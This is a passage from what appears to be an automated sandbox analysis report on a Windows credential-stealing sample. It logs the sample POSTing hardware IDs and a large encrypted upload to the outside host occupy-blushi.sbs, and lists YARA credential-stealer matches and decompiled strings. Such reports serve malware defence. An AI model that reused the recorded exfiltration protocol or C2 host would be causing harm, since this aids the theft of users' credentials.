69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 53 49 Data Ascii: --SIWABCLOLDE61LContent-Disposition: form-data; name="hwid"39B4372C31E91B8DB080989EF5FE92FF--SIWABCLOLDE61LContent-Disposition: form-data; name="pid"3--SIWABCLOLDE61LContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--SI
2024-11-25 22:34:19 UTC	5052	OUT	Data Raw: 28 58 da f6 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 Data Ascii: (X6K~`iO\_,mi`m?ls}Qm/X2x)
2024-11-25 22:34:20 UTC	1025	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 22:34:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=0gcphqte9edjulq1apm0rqt4k7; expires=Fri, 21-Mar-2025 16:20:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QYguDEg7vi7lvzJjq5nkoXTpqjxBt%2B4Q1FN9csaJJWV8hKqI%2FcuitzZTv%2FIxB81csoaLTNk9ezEyhnhRKGiVAFRyY6g9xpFZJ%2FM3fJsIY92X2mGGIo6Q1Fz%2FIK%2FlDE0ZEuRbgA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e851b017fde7c9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1989&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2844&recv_bytes=21342&delivery_rate=1425781&cwnd=163&unsent_bytes=0&cid=a0d88764666e1b13&ts=906&x=0"
2024-11-25 22:34:20 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-25 22:34:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49721	172.67.187.240	443	5380	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 22:34:22 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PNCJJ9DMPVDVZR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1205 Host: occupy-blushi.sbs
2024-11-25 22:34:22 UTC	1205	OUT	Data Raw: 2d 2d 50 4e 43 4a 4a 39 44 4d 50 56 44 56 5a 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 42 34 33 37 32 43 33 31 45 39 31 42 38 44 42 30 38 30 39 38 39 45 46 35 46 45 39 32 46 46 0d 0a 2d 2d 50 4e 43 4a 4a 39 44 4d 50 56 44 56 5a 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 4e 43 4a 4a 39 44 4d 50 56 44 56 5a 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 50 4e Data Ascii: --PNCJJ9DMPVDVZRContent-Disposition: form-data; name="hwid"39B4372C31E91B8DB080989EF5FE92FF--PNCJJ9DMPVDVZRContent-Disposition: form-data; name="pid"1--PNCJJ9DMPVDVZRContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--PN
2024-11-25 22:34:23 UTC	1015	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 22:34:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p3duh8i12cqhhuodcenjar18ni; expires=Fri, 21-Mar-2025 16:21:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B%2FpwkGqWOlHzzhUzMd%2Bf3V6uqULz1KUyDTc7uYNNg6As6tX6rB2gjfoFwtleHlI2c9aIOxqCKrgaJlxFqv9KmWVms6IkfQY7rO5hty80jZHSAlwZfBgyuMEy6nofztdMnSDzlA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e851b120cfc03d5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2047&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2119&delivery_rate=1392465&cwnd=223&unsent_bytes=0&cid=cba92c416a9ce170&ts=1495&x=0"
2024-11-25 22:34:23 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-25 22:34:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49729	172.67.187.240	443	5380	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 22:34:25 UTC	276	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=K6F7MVXO0I User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 552792 Host: occupy-blushi.sbs
2024-11-25 22:34:25 UTC	15331	OUT	Data Raw: 2d 2d 4b 36 46 37 4d 56 58 4f 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 39 42 34 33 37 32 43 33 31 45 39 31 42 38 44 42 30 38 30 39 38 39 45 46 35 46 45 39 32 46 46 0d 0a 2d 2d 4b 36 46 37 4d 56 58 4f 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 36 46 37 4d 56 58 4f 30 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4b 36 46 37 4d 56 58 4f 30 49 0d 0a 43 6f Data Ascii: --K6F7MVXO0IContent-Disposition: form-data; name="hwid"39B4372C31E91B8DB080989EF5FE92FF--K6F7MVXO0IContent-Disposition: form-data; name="pid"1--K6F7MVXO0IContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--K6F7MVXO0ICo
2024-11-25 22:34:25 UTC	15331	OUT	Data Raw: fb 2d 39 14 30 df 6f 89 80 1e 6f e0 0c b5 68 ce 1a 38 90 82 30 cc aa 57 c9 24 76 fe af b1 a6 3d 84 de f5 bf b7 5f df bc 0b 38 63 d0 c9 10 75 e6 57 a1 d7 67 c0 ce 46 ab 7d 7a 25 79 ed 42 91 a8 11 1c b1 9f e4 39 5a 63 88 cb bd 52 93 64 50 70 ac 0f 3f 18 b6 19 dd 7a 97 c2 e6 0e 4c 8c 1c 10 a4 7d 50 33 6f 94 ca 6e f3 44 bf 54 72 18 2b 97 03 d3 2d 94 90 ee 87 b4 87 77 59 1b c8 37 5c f1 c9 75 a7 a4 2c b1 24 8f 0d 0b aa 54 c5 36 17 4f 84 03 14 84 d3 01 45 19 09 c7 dc 52 f1 d9 06 90 d7 ce 66 47 60 db a3 0a 0f 4f 84 ae 78 ca cd 77 dd a0 61 e1 38 49 bc 91 9b c9 7a c2 44 46 f1 b2 8b 42 f5 45 75 77 dc 66 ec da 25 25 bd 54 58 16 ce 55 c1 0f 06 bb d4 49 25 4b 22 13 36 51 20 23 b6 6d f8 89 14 5b 4d 25 1a 0e 89 64 66 06 a4 3d 82 28 56 14 ce 58 f5 ff 1a 99 8a 1b 5b 07 c7 Data Ascii: -90ooh80W$v=_8cuWgF}z%yB9ZcRdPp?zL}P3onDTr+-wY7\u,$T6OERfG`Oxwa8IzDFBEuwf%%TXUI%K"6Q #m[M%df=(VX[
2024-11-25 22:34:25 UTC	15331	OUT	Data Raw: e0 5a fe 15 4a eb 7a e6 8c 7d 72 b8 88 a8 4f 66 7e 2b a6 41 35 ed 34 e1 d9 67 16 fa 4a 6d 9f ff 45 35 3f ce 14 9f 32 eb 48 5c 92 59 f9 00 67 84 53 ee ce 0f 7f 2c dd f9 78 4c 52 2f 81 63 6e 5a 61 9f 1a 32 4d ea 5c b8 81 43 08 dc d9 08 17 c1 7d 74 f8 a5 45 a7 33 cc fd 63 09 58 35 17 89 ba 98 7c 13 a1 f3 b4 25 d5 f8 c6 6b c5 d3 91 49 c3 df 4f 07 1b b4 08 dc 07 9d 59 ae 62 ec 4b 52 84 30 95 30 d5 cc 4a 39 8d 5d b9 b1 3f a5 54 47 43 b0 91 c4 95 95 20 29 b3 3d 12 b9 07 c9 bd 8e ce 4e 7b 7b 12 68 bb 71 eb de 08 b6 55 cf 96 72 8b ba 6b f8 eb cc 77 0b cc ac 26 5f a9 6a 9e 75 98 4a 08 62 6c 48 2d eb 8f bf de 5d a3 bf 52 f8 e2 ad 5b 5a 84 52 c1 af d4 81 fa 93 03 cc d3 bf 2c 09 9e 74 c1 17 9d 98 e2 fe 00 ce f5 ae ab eb 73 27 f2 6f b5 f9 6b 50 eb 34 4e 7e 5f 73 cb bf Data Ascii: ZJz}rOf~+A54gJmE5?2H\YgS,xLR/cnZa2M\C}tE3cX5\|%kIOYbKR00J9]?TGC )=N{{hqUrkw&_juJblH-]R[ZR,ts'okP4N~_s
2024-11-25 22:34:25 UTC	15331	OUT	Data Raw: ea 05 f1 a5 65 0a b2 23 6d f9 80 65 f2 c3 c6 39 5d b5 bb b5 af ff c8 64 fe 61 4a 5d 5b c4 45 6a 53 95 b7 e0 60 fe ad 4d fe 8e 45 95 d2 15 0d bd fa d3 a5 bd e8 8a ed 7f 02 d5 d2 6a fa f4 09 03 07 a4 64 93 40 29 b7 d8 de ea 1e cd 00 8b bf 0d 73 e6 e5 18 07 ec d7 fd 2b e5 5e 54 ba e9 a5 15 af 55 63 63 8f 71 12 16 f8 a3 96 37 c3 dc d3 4f 57 c9 35 4a 46 21 96 36 1f 92 8e 0c fc 1f 6f b1 d8 b2 0d 5e b7 c8 c4 b9 f7 af a7 dd fb 4e af fc 22 b6 5f 75 d0 cc a6 f6 ef cd 19 4c cf 44 b6 0a 60 8e 4f 32 3b fe a2 5e 40 41 db 4d 92 b7 33 b6 58 d0 93 3b 6a 5a 4d ef 82 97 cd e6 54 9b 9c 66 10 e8 db 8f 98 72 03 d2 19 a4 dd f5 56 b1 b8 60 ab d8 e9 9e 5e 59 01 70 b5 59 23 c6 ad 52 7d 4e 48 66 cc e0 d3 b1 d5 9f 24 d3 c8 69 88 01 97 7c 1d 4f f5 79 e7 a0 91 d1 73 8d 4d 9d d8 fc 3e Data Ascii: e#me9]daJ][EjS`MEjd@)s+^TUccq7OW5JF!6o^N"_uLD`O2;^@AM3X;jZMTfrV`^YpY#R}NHf$i\|OysM>
2024-11-25 22:34:25 UTC	15331	OUT	Data Raw: d4 5e df ef c8 fb 3d ac dd ab ee 62 30 ec 23 8a 3f d0 bc 73 9a 4a a2 84 df c4 f4 01 f7 de 65 57 ce 45 66 a6 0e 6a 63 eb e2 82 99 00 a3 aa 25 db 17 88 80 a9 14 b2 17 ff 3e b2 df 4d c6 d4 0f 71 ef d8 67 94 3e 8c 09 59 ec bd 72 f3 71 74 f5 25 28 e5 b6 e0 8f c1 93 ba 5e 65 42 ab 5b 1a 66 81 c1 ed ee f6 d7 b9 a8 7d d3 fc 65 25 cb cb 32 a0 d8 66 04 51 bc 37 8f bc 7d a7 27 b1 e3 1a 7e c6 de 94 b1 28 00 11 08 ab be 45 6a f9 c5 1f a9 b0 00 27 e2 35 b9 a7 df 8b 0b 95 50 9a 9e c4 36 0c 4e 9f b3 2f 54 cd db c0 c5 5f 36 d7 9d cf b0 b9 1a f6 7e c5 d3 76 04 cd 83 3b bf fb b7 0a 90 be a1 d5 85 61 f7 c0 11 8f 7a 6f 33 65 84 03 78 f0 e5 50 ec 6c 75 95 f7 79 a8 fe 64 bb e0 66 ff 07 dd ac bf f9 c6 cb 5a 48 0c a7 fd 6f fb 8a d5 73 10 b2 64 15 8a a2 3d 92 0a 70 f5 df be 7f 3c Data Ascii: ^=b0#?sJeWEfjc%>Mqg>Yrqt%(^eB[f}e%2fQ7}'~(Ej'5P6N/T_6~v;azo3exPluydfZHosd=p<
2024-11-25 22:34:25 UTC	15331	OUT	Data Raw: da 8a cb 50 b7 5a 1c 40 e0 3a 83 e6 3e f3 81 79 22 2b 26 40 13 22 97 8e a6 f5 af f9 15 73 3f 18 52 e2 01 e7 79 7d a1 0c 88 ca cf 3e 06 0f 8a 3b a7 57 57 f2 43 8c d3 9a 4f 80 4f 33 28 34 ef 90 31 df 90 08 ff 79 ff 84 c9 c9 ba 7f ba 69 76 fb 7e f3 70 69 7c 46 31 4f 88 14 cf bf be 5e 0a 31 75 f0 f8 a1 b4 03 10 a3 0d 0d 6f 47 53 23 30 b0 d0 d0 ff 1d 67 8b 85 45 27 4e 1f 03 5d 6f 78 0b ad 81 bb 0c 0d d1 72 27 f6 ee 96 57 eb b2 c0 88 13 93 ae 1f c3 f9 e8 01 12 09 21 7c 25 3b 0d 37 fd 17 94 5e fe 7c de 2e a6 93 bd 75 a2 88 bd 94 42 eb 92 62 cf 94 70 35 9c 9c 9f dc ac f1 3d a3 eb f3 eb 5b d8 f9 20 0b 72 39 81 a1 c9 fa ef 9d 91 52 5f 8d 76 b5 91 48 a3 c0 ee b2 22 25 80 59 a9 d1 8f 0c 36 40 2f 9c f1 db 7e b3 d5 f4 98 56 9a 9c 7f 94 35 75 8a ec 20 21 70 e1 09 45 96 Data Ascii: PZ@:>y"+&@"s?Ry}>;WWCOO3(41yiv~pi\|F1O^1uoGS#0gE'N]oxr'W!\|%;7^\|.uBbp5=[ r9R_vH"%Y6@/~V5u !pE
2024-11-25 22:34:25 UTC	15331	OUT	Data Raw: a9 30 27 62 b3 67 e4 bd a1 92 64 7a 78 e6 36 a2 11 26 95 92 02 74 f6 b1 f8 65 56 e6 1b 7b bf 31 13 cb a8 51 ea 83 89 82 80 bc cc 1a bd ec 4f 37 2a f6 35 7e ba 29 89 eb bd 3e dc b8 82 e9 a9 1c fc 1c 21 af 65 ba 6f 5d b5 37 6c d5 88 65 82 4a c5 04 2b ab be f7 9b ff 18 06 22 09 80 e8 ae ec 1a f1 a1 c9 6c 20 52 03 57 77 fa 03 3f f8 f7 ee 6d 91 72 af 40 22 a5 f2 ec ed be 1e d8 ab d9 f0 6a c5 f1 ab e5 95 59 47 d7 28 93 03 d6 2a 85 0e 70 a1 ee 29 63 c8 b2 7a e2 87 72 f0 f1 81 e9 05 53 85 2b ec cd f2 80 8c 04 68 f0 06 86 fb 44 c8 4c 5c c6 29 74 e1 80 19 a2 a5 d9 2f db b0 b2 c3 ec 48 4f 8e 18 a5 5a 4c f6 a0 80 c4 0b 67 02 7c d5 d2 05 4e e2 22 b8 97 4a e2 ab 11 82 10 c4 89 14 e1 85 bf 34 89 fd a8 5c b1 bf a7 0a f2 58 94 e7 84 ce bf 8f aa 8a 0c 1c dd b5 af 45 9d d9 Data Ascii: 0'bgdzx6&teV{1QO75~)>!eo]7leJ+"l RWw?mr@"jYG(p)czrS+hDL\)t/HOZLg\|N"J4\XE
2024-11-25 22:34:25 UTC	15331	OUT	Data Raw: d1 01 cd 95 91 ae 28 71 9f b1 49 3b 0c 8a e5 51 57 8c 75 27 39 b4 50 01 d0 b7 ea 29 0b de 8a 55 ee 16 ed e7 d7 f3 df ef d5 72 6c ba 75 75 45 c0 fb 18 7a 9d 2a fd 9b 16 c1 8f 02 bc e8 6e a2 c0 c2 e1 af 0e 9f 79 a1 d0 2e bf cf c8 e4 1e 33 05 a4 ea 14 39 82 5c be 7b 76 03 fd d7 6e f6 7a 1a 76 20 ac a8 0c 04 ab 43 53 32 5b cc f4 f0 fc 1c 29 c8 e5 d7 00 13 8b a3 91 3f ca 51 5b 21 cb 02 07 03 70 1a 51 9f ab 45 56 04 44 95 2c 04 fd 56 0a b7 ba 13 25 4c d8 c1 d4 2e f8 07 25 b3 d0 0e 3d 3a 57 27 07 59 35 14 f1 ac 2e 29 11 57 f7 ec d0 a9 e0 dd 39 34 ea 57 28 7c 7e a4 d9 b9 7f ec f8 bb 9b ea 19 3f 92 68 d8 e9 e8 af da 19 0e 4e cd b2 d1 5d 35 dd af d1 4e dd 08 97 24 42 3b e2 c0 20 26 27 8b 6e 82 86 41 c4 96 f8 2b 1a 07 a3 ca 45 0c 6a d4 ee d0 04 69 f8 12 b1 1e 04 b9 Data Ascii: (qI;QWu'9P)UrluuEz*ny.39\{vnzv CS2[)?Q[!pQEVD,V%L.%=:W'Y5.)W94W(\|~?hN]5N$B; &'nA+Eji
2024-11-25 22:34:25 UTC	15331	OUT	Data Raw: fd 68 93 61 ad ae 5d 45 52 8b c2 46 99 89 93 5a 4d 6c 0d 92 14 8b 62 ac 2c 56 89 bd 52 73 f5 ce 1e 50 28 85 af be 22 56 0a 14 71 8e ce ce ee 88 ee 30 ad 23 75 93 65 8c e9 e4 52 e9 cb aa ce d9 dc 52 de 6b 39 d7 56 1d 72 c7 1c 29 ea dc ff d3 8b fc ef 4b e8 5e e0 ea e6 22 c9 3e ed 97 a5 06 ff ef 78 6d f8 4b 57 2d a0 75 96 75 25 56 42 8c 85 52 78 aa f7 56 7b e7 2d 59 f8 08 c9 15 8e b1 be 26 59 e3 dc ac e6 fe 87 de 38 f1 d2 7b 3b 93 f3 53 ff dd e5 90 a2 72 dc e8 fb 91 b5 fc 90 88 97 f8 78 75 c2 8d 82 88 76 23 97 33 a2 35 3e 41 e3 f3 3f d6 68 fa 2e e0 81 ca 48 8f 1c c8 5c 5a b8 83 86 c8 d7 1e 0a 60 22 ec e4 ff 5e 01 89 95 cb 72 82 68 97 28 30 e3 66 8d c0 9f 34 2d 2a 3c 9d 34 d0 62 00 1a aa 1b 11 7f ac 62 5b f2 1e 46 12 e4 37 6b af 8f 16 7e 4f b9 5a 54 3c 99 fd Data Ascii: ha]ERFZMlb,VRsP("Vq0#ueRRk9Vr)K^">xmKW-uu%VBRxV{-Y&Y8{;Srxuv#35>A?h.H\Z`"^rh(0f4-*<4bb[F7k~OZT<
2024-11-25 22:34:25 UTC	15331	OUT	Data Raw: 5b 0e f2 7d 37 58 b8 72 2d 7c 68 74 46 9f 4a ce 40 d2 c4 2f 12 4f 60 aa 9f 92 1e 91 01 d3 f2 dc 22 f7 5c 90 d7 7b de 99 b7 43 5d 4d 17 09 1c 75 f6 33 8d 7e ab 26 88 59 81 43 03 b8 20 e4 be 50 21 b3 4a 3d 9c 17 c8 fe 98 93 7c 59 3d 24 d9 62 2e 2f bc 7b f2 f2 ba cc 60 5f dd c3 df 3a 57 de 6f 44 89 76 b5 e7 96 5e 10 50 f8 f5 ff 7f 46 87 07 1e 4c 18 3f 13 07 6b 77 18 2b a0 00 29 30 63 4b 06 08 f8 24 ee ef 77 7d 8d 1b 86 17 3b 71 95 4f f7 72 dd 77 e8 0a 21 5f dc 79 14 9b 39 2e b4 3c 7f 5f d8 f9 1f dd 23 fa 7e b4 9b ad 9b 01 ba 7e 26 00 01 04 a3 ba d2 cf 33 68 55 be 25 c9 62 f2 b8 71 f5 b7 d8 a6 0f 82 ac 7a c3 36 9d f7 a6 66 b0 cf a9 8f c6 d7 5e 2f 76 d5 d7 3c b1 fa 77 f7 55 e7 7c 0b 06 3c 3a 6b 08 87 ae 06 bf dd 6b 2a 00 58 c5 30 2c 6e 35 c3 05 b5 39 f9 82 0b Data Ascii: [}7Xr-\|htFJ@/O`"\{C]Mu3~&YC P!J=\|Y=$b./{`_:WoDv^PFL?kw+)0cK$w};qOrw!_y9.<_#~~&3hU%bqz6f^/v<wU\|<:kk*X0,n59
2024-11-25 22:34:30 UTC	1027	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 22:34:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=92krqbbuculk9n22p78jm35ora; expires=Fri, 21-Mar-2025 16:21:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GaHW0zq2cHOgTsOxxZ0Xs6DAVYJKPcDludfI8QcfYrU%2FzG46JZh2BkLfBAsR43UFmi0JfdhrshOS5uGl%2BdW35LNpmBje%2BvJf3MoZFH9aHDbb0YuggUAKOQU%2FSPmri%2F5sQ9Phrw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e851b26694b0f42-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1609&sent=198&recv=577&lost=0&retrans=0&sent_bytes=2844&recv_bytes=555288&delivery_rate=1822721&cwnd=180&unsent_bytes=0&cid=5cd68bac4d0367a8&ts=4851&x=0"

Target ID:	0
Start time:	17:34:04
Start date:	25/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa90000
File size:	1'870'848 bytes
MD5 hash:	AE35CD7C9BE6BE3A150F903DDD1E411D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1336629907.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1336085175.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1383847377.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1310755085.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1311800277.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1359632994.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1359202911.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1386704934.00000000007F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1359393322.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	62.4%
Total number of Nodes:	234
Total number of Limit Nodes:	16

Executed Functions

Function 00A9EAEB Relevance: 27.3, APIs: 1, Strings: 17, Instructions: 291
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 00A9EB01

Strings

}A3G, xrefs: 00A9EDDA
]%I;, xrefs: 00A9ED8D
2I=O, xrefs: 00A9EDC4
J9?, xrefs: 00A9ED98
=Y,_, xrefs: 00A9EDF0
2E&[, xrefs: 00A9EDE5
X)R/, xrefs: 00A9ED6C
0Uwk, xrefs: 00A9EE11
4Q3W, xrefs: 00A9EE06
:M?C, xrefs: 00A9EDCF
B, xrefs: 00A9EB15
;]!S, xrefs: 00A9EDFB
vino, xrefs: 00A9EE1C
A!R', xrefs: 00A9ED82
\_, xrefs: 00A9EE6C
U-E#, xrefs: 00A9ED77
|, xrefs: 00A9EBEE

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: Uninitialize
String ID: 0Uwk$2E&[$2I=O$4Q3W$:M?C$;]!S$=Y,_$A!R'$B$J9?$U-E#$X)R/$\_$]%I;$vino$|$}A3G
API String ID: 3861434553-1475428933
Opcode ID: 44b5655eb40bf2cc6d6c568eaffaba9d07b74cf9a52b2a1461acd59247a3a1ac
Instruction ID: 4416714de29123544cd10fbcb8bc48a29cd70808b4903122ccf9b7f53871bdf9
Opcode Fuzzy Hash: 44b5655eb40bf2cc6d6c568eaffaba9d07b74cf9a52b2a1461acd59247a3a1ac
Instruction Fuzzy Hash: FEA1CDB060C3D18BDB35CF2584917EBBBE1AFA7304F449AACD0D94B246D775440A8B97

Function 00A9DBE5 Relevance: 21.5, Strings: 17, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

vino, xrefs: 00A9DF36
:M?C, xrefs: 00A9DEE9
=Y,_, xrefs: 00A9DF0A
2E&[, xrefs: 00A9DEFF
A!R', xrefs: 00A9DE9C
ojz., xrefs: 00A9DD8A
]%I;, xrefs: 00A9DEA7
bpwv, xrefs: 00A9DCD4
}A3G, xrefs: 00A9DEF4
J9?, xrefs: 00A9DEB2
U-E#, xrefs: 00A9DE91
X)R/, xrefs: 00A9DE86
btw~, xrefs: 00A9DCC9
4Q3W, xrefs: 00A9DF20
0Uwk, xrefs: 00A9DF2B
;]!S, xrefs: 00A9DF15
2I=O, xrefs: 00A9DEDE

Memory Dump Source

